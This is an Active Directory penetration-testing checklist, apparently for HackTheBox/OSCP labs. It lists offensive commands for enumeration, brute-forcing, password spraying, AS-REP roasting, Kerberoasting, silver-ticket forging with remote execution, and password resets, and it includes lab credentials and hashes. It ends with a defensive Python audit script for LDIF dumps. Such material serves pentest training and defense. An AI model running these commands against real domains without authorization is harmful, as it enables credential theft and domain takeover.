# Active Directory Checklist

## Unauthenticated

* [ ] Unauthenticated
  * [ ] Get Hostnames
    * [ ] `nxc smb 192.168.209.1`
    * [ ] Use nslookup with the server set to the DC/NS server and query localhost or the target IP (reverse lookup)
      * [ ] `nslookup`, then `> server <DC/NS server>`, then `> <IP>`
    * [ ] run dnsrecon on the subnet `dnsrecon -d <domain> -r <ip range>`
  * [ ] Setup /etc/hosts
    * [ ] `nxc smb [IP]`
    * [ ] Alternatively add the name server to /etc/resolv.conf
  * [ ] Sync time for Kerberos if there is clock skew
    * [ ] `sudo ntpdate [IP]`
    * [ ] `sudo rdate -n [IP]`
  * [ ] Nmap TCP scan
    * [ ] Host identification
      * [ ] `sudo nmap -T4 -p 21,22,23,25,53,69,80,81,88,110,111,119,123,137-139,161,389,443,445,465,500,512-513,548,587,623-624,993-995,1099,11211,1241,1433-1434,1521,1723,2049,2483-2484,27017-27019,3268-3269,3306,3389,4333,4786,4848,5060-5061,5432,5800,5900-5901,5985-5986,6000-6001,7001,8000,8080,8181,8443,10000,16992-16993,32764 -v 172.16.1.0/24 -oA scans/nmap-pulse-172.16.1.0`
        * [ ] `cat scans/nmap-pulse-172.16.1.0.gnmap|grep ': Up'|cut -d ' ' -f2 > active_hosts`
    * [ ] `sudo nmap -sV -sC -oA scans/nmap-tcp-initial -v [IP]`
    * [ ] `sudo nmap -sV -sC -oA scans/nmap-tcp-full -p- -v [IP]` Tip: if the target is a DC, make sure your clock is correct before testing the Kerberos port (88)
    * [ ] Use nslookup with the server set to the DC/NS server and query localhost or the IP; if an IPv6 address comes back, scan it too:
      * [ ] `nmap -6 [ipv6]`
  * [ ] Nmap UDP scan
    * [ ] `sudo nmap -sU -p 53,69,111,161,500,623,2049 --open -oA scans/nmap-udp -iL targets.txt`
  * [ ] Get Domain Info
    * [ ] `ldapsearch -x -H ldap://<ip> -s base namingcontexts`
    * [ ] `ldapsearch -x -H ldap://10.129.53.189 -b 'dc=egotistical-bank,dc=local' -s sub '*'`
    * [ ] `nxc smb resolute -u '' -p '' --pass-pol`
  * [ ] Dump AD Users (DC)
    * [ ] `nxc smb 192.168.209.1 -u '' -p '' --users`
    * [ ] `nxc ldap resolute -u '' -p '' -M user-desc`
    * [ ] `rpcclient -U '' 10.129.96.155`
      * [ ] `enumdomusers`
      * [ ] `querydispinfo`
    * [ ] `ldapsearch -LLL -x -H ldap://192.168.129.100 -b 'dc=oscp,dc=exam' -s sub '(objectclass=person)' '*'|grep -i samaccountname|cut -d ':' -f 2|sed 's/ //g'>>users` (the `-b` base must be a DN, not the DNS name) Tip: Did you get all users? Remember svc-alfresco?
    * [ ] `impacket-GetADUsers -dc-ip 10.129.227.113 -dc-host dc01 "timelapse.htb/" -all -debug` Tip: if you are able to dump users, read through the output for plain-text passwords in the description column. Also try AS-REP roasting and brute-forcing.
  * [ ] Enumerate anonymous/null file shares
    * [ ] `nxc smb 192.168.209.1 -u '' -p '' --shares`
    * [ ] `nxc smb 192.168.209.1 -u 'a' -p '' --shares | tee scans/nxc-anon-shares.log`
    * [ ] `smbclient -L //192.168.209.1`
    * [ ] `smbmap -d megabank.local -u '' -H resolute -r --depth 20|tee scans/smbmap-anon-recursive.log`
    * [ ] `smbmap -d megabank.local -u 'a' -H resolute -r --depth 20|tee scans/smbmap-anon-recursive.log`
    * [ ] `smbmap -d cascade.local -H casc-dc1 -r --depth 20 -A '(html|vbs|ps1|txt|log|xml|reg|config|bak|ini|sh|bat|json|yml|yaml|sql|php|asp|aspx|jsp|jspx|cer|key|pem|p12|pfx|crt|conf|cfg|md|htpasswd|gitignore|dockerfile|db)'`
    * [ ] Check files closely with exiftool and strings
    * [ ] Mount shares and test writability
  * [ ] Users accounts
    * [ ] Enumerate Users
      * [ ] `~/Documents/loadables/tools/kerbrute userenum -d htb.local --dc rabbit /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt -t 500`
      * [ ] `nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='oscp.exam',userdb=/usr/share/wordlists/seclists/Usernames/Names/names.txt -Pn 192.168.129.100`
      * [ ] Enumerate from files found with exif tool
    * [ ] Brute-force Accounts
      * [ ] `nxc ldap monteverde -u users -p users --no-bruteforce` Tip: try this first
      * [ ] Create a word list from a user dump
        * [ ] `hashcat users -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/leetspeak.rule --stdout > pguesses` Tip: you could add months and seasons to this. NSA rules are really good.
      * [ ] `nxc ldap monteverde -u users -p users`
      * [ ] `kerbrute bruteuser -d oscp.exam --dc dc01 /usr/share/wordlists/fasttrack.txt --verbose lisa` Tip: Doesn't create event code 4624 to indicate a failed password
      * [ ] `cat users | xargs -t -I USR ~/loadables/tools/kerbrute bruteuser --dc resolute -d megabank.local -t 200 /usr/share/wordlists/seclists/Passwords/Default-Credentials/default-passwords.txt --verbose USR` Tip: check all accounts against the users we found (user = user, pass = user)
  * [ ] ASRepRoast
    * [ ] LDAP filter for accounts with Kerberos pre-authentication disabled (userAccountControl bit DONT_REQ_PREAUTH = 4194304; the `:1.2.840.113556.1.4.803:` matching rule is a bitwise AND): `(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))`
    * [ ] `nxc ldap [DC IP] -u users -p '' --asreproast hashes/asreproast.hash`
    * [ ] `impacket-GetNPUsers -dc-ip sauna -request -usersfile users -outputfile hashes/asreproast.hash 'egotisticalbank/'`

## Authenticated

Tip: Once authenticated, the VPN could be switched to a Windows VM host to make life easier for certain attacks.

* [ ] Authenticated
  * [ ] Shares/Policy
    * [ ] `nxc smb hathor -u users -p passwords -k -d windcorp.htb -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=finds`
    * [ ] `smbmap -d <domain> -u melanie -p 'Welcome123!' -H resolute -r --depth 20`
    * [ ] `smbmap -d cascade.local -u 'r.thompson' -p rY4n5eva -H casc-dc1 -r --depth 20 -A '(html|vbs|ps1|txt|log|xml|reg|config|bak|ini|sh|bat|json|yml|yaml|sql|php|asp|aspx|jsp|jspx|cer|key|pem|p12|pfx|crt|conf|cfg|md|htpasswd|gitignore|dockerfile|db)'`
    * [ ] Check files closely with exiftool and strings
    * [ ] Use dnspy to decompile fishy exec files
    * [ ] sniff traffic of exec files
  * [ ] Kerberoast
    * [ ] LDAP filter for normal user accounts with an SPN, excluding krbtgt and disabled accounts (userAccountControl bit ACCOUNTDISABLE = 2): `(&(samAccountType=805306368)(servicePrincipalName=*)(!(samAccountName=krbtgt))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))`
    * [ ] `nxc ldap 192.168.0.104 -u harry -p pass --kerberoasting hashes/kerbroast`
    * [ ] `impacket-GetUserSPNs -request -dc-ip 10.129.249.79 -target-domain active.htb active.htb/svc_tgs`
  * [ ] Bloodhound / ldapsearch / AD Users
    * [ ] `bloodhound-python -u 'ldap' -c all -d support.htb -ns 10.129.239.21 -p 'pass' --dns-tcp`
      * [ ] Set Objects as owned as you go
      * [ ] Look for GenericAll Privileges given direct or thorough groups. Use the Outbound object control to view these privileges.
    * [ ] `Sharphound.exe -c all -d active.htb --domaincontroller 10.10.10.100` Tip: Run this from a `runas /netonly` shell after grabbing a ticket with `dir \\<DC IP>`
    * [ ] `nxc ldap <ip> -u user -p pass --bloodhound -ns <ns-ip> --collection All` Tip: Make sure ~/.nxc/nxc.conf is configured. THIS DOESN'T WORK FOR ME
    * [ ] `ldapdomaindump -u 'support.htb\ldap' -p $(cat ../passwords) --no-json --no-grep -r dc`
    * [ ] `ldapsearch -H ldap://support.htb -b 'dc=support,dc=htb' -D 'ldap@support.htb' -w 'pass' -s sub '(objectclass=user)' 'info' 'description'` Tip: request `'*'` as the attribute list and look at ALL fields for users, especially info and description
    * [ ] `ldapsearch -H ldap://dc1 -b 'dc=scrm,dc=local' -U 'ksimpson' -W -s sub '(objectclass=user)' 'memberof'`
    * [ ] Analyze full domain dump for anomalies
      * [ ] `cat domain.ldif|awk '{print $1}'|sort | uniq -c | sort -nr`
    * [ ] Dump AD Users (DC)
      * [ ] `nxc ldap dc -u ldap -p passwords --users`
  * [ ] Silver Ticket
    * [ ] Need NTLM hash of password
      * [ ] `python3 -c "import hashlib;r=hashlib.new('md4','REGGIE1234ronnie'.encode('utf-16le')).digest().hex();print(r)"` Tip: on Python builds linked against OpenSSL 3, md4 lives in the legacy provider and this raises `ValueError: unsupported hash type md4` unless that provider is enabled
    * [ ] Need domain SID
      * [ ] `nxc ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sid`
      * [ ] `Get-ADDomain`
      * [ ] `impacket-getPac -targetUser administrator scrm.local/ksimpson:ksimpson`
    * [ ] `impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSvc/dc1.scrm.local administrator` Tip: an invalid SPN hands the blue team an IoC, so get the SPN exactly right
      * [ ] `export KRB5CCNAME=<TGS_ccache_file>`
      * [ ] `impacket-psexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass`
      * [ ] `impacket-smbexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass`
      * [ ] `impacket-wmiexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass`
      * [ ] `impacket-mssqlclient <domain_name>/<user_name>@<remote_hostname> -k -no-pass`
  * [ ] Password Spray Tip: New passwords found are worth a spray
    * [ ] `~/Documents/loadables/tools/kerbrute passwordspray -d search.htb --dc research -t 500 users '@3ONEmillionbaby'`
    * [ ] `nxc ldap research -u users -p '@3ONEmillionbaby' --continue-on-success`
  * [ ] Golden Ticket Forgery CVE-2014-6324
    * [ ] `impacket-goldenPac htb.local/james:'J@m3s_P@ssW0rd!'@mantis`
  * [ ] Can you change passwords?
    * [ ] `rpcclient $> setuserinfo2 audit2020 23 'ASDqwe123'`
  * [ ] Is this a Certificate Authority with vulnerable cert? <https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation>
    * [ ] `certipy-ad find -vulnerable -dc-ip 10.129.228.253 -enabled -u ryan.cooper@sequel.htb -p NuclearMosquito3` Tip: <https://github.com/ly4k/Certipy>
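
The two LDAP filters in the ASRepRoast and Kerberoast items above are bit tests on `userAccountControl` plus a few attribute checks. As an added example (my own code, not part of this checklist nor of any tool it lists), the Python script below applies exactly those tests to an LDIF dump like the one the `ldapsearch -LLL` item writes, so a defender reviewing a domain export offline can find pre-auth-disabled users and SPN-bearing user accounts before they are roasted. The LDIF sample, account names and `example.local` domain are constructed for this example; only the standard library is used.

```python
"""Added audit helper (not part of the checklist): applies the same account tests
as the AS-REP roast and Kerberoast LDAP filters to an LDIF dump such as the one
`ldapsearch -LLL` writes. SAMPLE_LDIF is constructed for this example."""
import base64

DONT_REQ_PREAUTH = 0x400000          # userAccountControl 4194304: no Kerberos pre-auth
ACCOUNTDISABLE = 0x2                 # userAccountControl 2: account disabled
SAM_NORMAL_USER_ACCOUNT = 805306368  # sAMAccountType of ordinary user objects

# Constructed dump: one pre-auth-less user, one live and one disabled SPN
# account, and krbtgt. Includes a folded line and a base64 ('::') value.
SAMPLE_LDIF = """\
dn: CN=svc-alfresco,OU=Service Accounts,DC=example,DC=local
objectClass: user
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=example,DC=local
sAMAccountName: svc-alfresco
sAMAccountType: 805306368
userAccountControl: 4260352
description:: QWxmcmVzY28=

dn: CN=sqlsvc,OU=Service Accounts,DC=example,DC=local
objectClass: user
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=example,DC=local
sAMAccountName: sqlsvc
sAMAccountType: 805306368
userAccountControl: 66048
servicePrincipalName: MSSQLSvc/dc1.exam
 ple.local:1433

dn: CN=oldsvc,OU=Service Accounts,DC=example,DC=local
objectClass: user
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=example,DC=local
sAMAccountName: oldsvc
sAMAccountType: 805306368
userAccountControl: 66050
servicePrincipalName: HTTP/web.example.local

dn: CN=krbtgt,CN=Users,DC=example,DC=local
objectClass: user
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=example,DC=local
sAMAccountName: krbtgt
sAMAccountType: 805306368
userAccountControl: 514
servicePrincipalName: kadmin/changepw
"""


def parse_ldif(text):
    """One {attribute(lowercased): [values]} dict per entry; unfolds continuation
    lines, skips '#' comments, decodes 'attr:: base64' values."""
    logical = []
    for raw in text.splitlines():
        if raw.startswith(" ") and logical:
            logical[-1] += raw[1:]          # continuation of the previous line
        else:
            logical.append(raw)
    entries, current = [], {}
    for line in logical + [""]:             # trailing "" flushes the last entry
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
        elif not line.startswith("#"):
            name, _, value = line.partition(":")
            if value.startswith(":"):       # base64-encoded value
                value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
            current.setdefault(name.lower(), []).append(value.strip())
    return entries

def uac(entry):
    return int(entry.get("useraccountcontrol", ["0"])[0])

def asrep_roastable(entry):
    """objectCategory person, objectClass user, UAC & DONT_REQ_PREAUTH != 0
    (the :1.2.840.113556.1.4.803: matching rule is a bitwise AND)."""
    return (entry.get("objectcategory", [""])[0].lower().startswith("cn=person,")
            and "user" in [v.lower() for v in entry.get("objectclass", [])]
            and bool(uac(entry) & DONT_REQ_PREAUTH))

def kerberoastable(entry):
    """Normal user account type, at least one SPN, not krbtgt, not disabled."""
    return (int(entry.get("samaccounttype", ["0"])[0]) == SAM_NORMAL_USER_ACCOUNT
            and bool(entry.get("serviceprincipalname"))
            and entry.get("samaccountname", [""])[0].lower() != "krbtgt"
            and not uac(entry) & ACCOUNTDISABLE)

def audit(text):
    """sAMAccountNames matching each condition, in dump order."""
    entries = parse_ldif(text)
    return {"asrep": [e["samaccountname"][0] for e in entries if asrep_roastable(e)],
            "kerberoast": [e["samaccountname"][0] for e in entries if kerberoastable(e)]}

if __name__ == "__main__":
    print(audit(SAMPLE_LDIF))
```

Run it against a real export with `audit(open("domain.ldif").read())`; on the constructed sample it reports `svc-alfresco` as AS-REP roastable and only `sqlsvc` as Kerberoastable, since `oldsvc` is disabled and `krbtgt` is excluded just as the filters exclude them. Both checks read the raw integer rather than relying on a server-side matching rule, which is also why they work on an offline dump.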
